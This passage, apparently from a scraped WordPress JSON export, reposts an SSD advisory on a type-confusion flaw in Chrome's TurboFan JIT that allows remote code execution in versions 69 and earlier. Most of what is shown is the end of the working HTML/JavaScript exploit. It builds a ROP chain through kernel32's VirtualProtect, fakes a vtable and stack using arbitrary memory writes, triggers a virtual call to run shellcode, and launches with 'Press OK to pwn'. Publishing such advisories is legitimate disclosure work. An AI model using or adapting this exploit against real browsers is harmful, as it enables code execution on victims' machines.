class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">scratch_u64<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">fill<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">gadget<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">100<\/span><span 
class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-229\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-c\">\/\/scratch_u64.fill(0xdeadbeefn, 0, 100);<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-230\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-231\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">let <\/span><span class=\"crayon-v\">fake_vtab<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">scratch_addr<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-232\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">let <\/span><span class=\"crayon-v\">fake_stack<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">scratch_addr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x10000n<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-233\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-234\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">let <\/span><span class=\"crayon-v\">stack<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><\/div>\n<div 
class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-235\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">pop_gadgets<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-236\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">sc_addr<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-237\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">pop_gadgets<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-238\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-cn\">0x1000n<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-239\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">pop_gadgets<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">2<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-240\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span 
class=\"crayon-cn\">0x40n<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-241\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">pop_gadgets<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">3<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-242\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">scratch_addr<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-243\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">kernel32<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x193d0n<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-c\">\/\/ VirtualProtect<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-244\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">sc_addr<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-245\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-246\"><span 
class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">for<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-i\">let<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">stack<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">length<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">++<\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-247\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">scratch_u64<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0x10000<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">8<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">stack<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-248\"><span 
class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-249\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-250\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">memory<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">writePtr<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">el_addr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x10n<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">fake_stack<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-c\">\/\/ RSP<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-251\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">memory<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">writePtr<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">el_addr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x50n<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">pop_gadgets<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1n<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span 
class=\"crayon-c\">\/\/ RIP = ret<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-252\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">memory<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">writePtr<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">el_addr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x58n<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0n<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-253\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">memory<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">writePtr<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">el_addr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x60n<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0n<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-254\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">memory<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">writePtr<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">el_addr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x68n<\/span><span 
class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0n<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-255\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">memory<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">writePtr<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">el_addr<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">fake_vtab<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-256\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-257\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-c\">\/\/ Trigger virtual call<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-258\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">div<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">dispatchEvent<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Event<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;click&#8217;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-259\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-260\"><span 
class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-c\">\/\/ We are done here, repair the corrupted array buffers<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-261\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">let <\/span><span class=\"crayon-v\">addr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">memory<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">addrof<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">driver_buf<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-262\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">memory<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">writePtr<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">addr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">32n<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">original_driver_buf_ptr<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-263\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">memory<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">writePtr<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">memview_buf_addr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span 
class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">32n<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">original_memview_buf_ptr<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-264\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-265\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-266\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-r\">alert<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;Press OK to pwn&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-267\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">pwn<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-268\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-ta\">&lt;\/script&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-269\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">head<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-270\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">body<\/span><span 
class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-271\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">body<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-272\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">html<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0309 seconds] -->  <\/p>\n<div class=\"printfriendly pf-alignleft\"><a href=\"#\" rel=\"nofollow\" onclick=\"window.print(); return false;\" class=\"noslimstat\" title=\"Printer Friendly, PDF &#038; Email\"><img decoding=\"async\" style=\"border:none;-webkit-box-shadow:none; box-shadow:none;\" src=\"https:\/\/cdn.printfriendly.com\/buttons\/printfriendly-button.png\" alt=\"Print Friendly, PDF &#038; Email\" \/><\/a><\/div>\n<\/div><\/div>\n<p><a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3783\" target=\"bwo\" >https:\/\/blogs.securiteam.com\/index.php\/feed<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/cdn.printfriendly.com\/buttons\/printfriendly-button.png\"\/><\/p>\n<p><strong>Credit to Author: SSD \/ Ori Nimron| Date: Mon, 29 Oct 2018 09:21:47 +0000<\/strong><\/p>\n<p>Vulnerabilities Summary The following advisory discusses a vulnerability found in turbofan, the JIT compiler. We can trigger the JavaScript code in a way that leads to type confusion that can be exploited in order to execute code remotely on Google Chrome Versions 69.0 and before. 
Vendor Response Vendor has fixed the issue in Google Chrome &#8230; <a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3783\" class=\"more-link\">Continue reading <span class=\"screen-reader-text\">SSD Advisory \u2013 Chrome Type Confusion in JSCreateObject Operation to RCE<\/span><\/a><\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10643,10754],"tags":[11682,10757,19988],"class_list":["post-13713","post","type-post","status-publish","format-standard","hentry","category-independent","category-securiteam","tag-remote-code-execution","tag-securiteam-secure-disclosure","tag-type-confusion"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/13713","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=13713"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/13713\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=13713"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=13713"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=13713"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}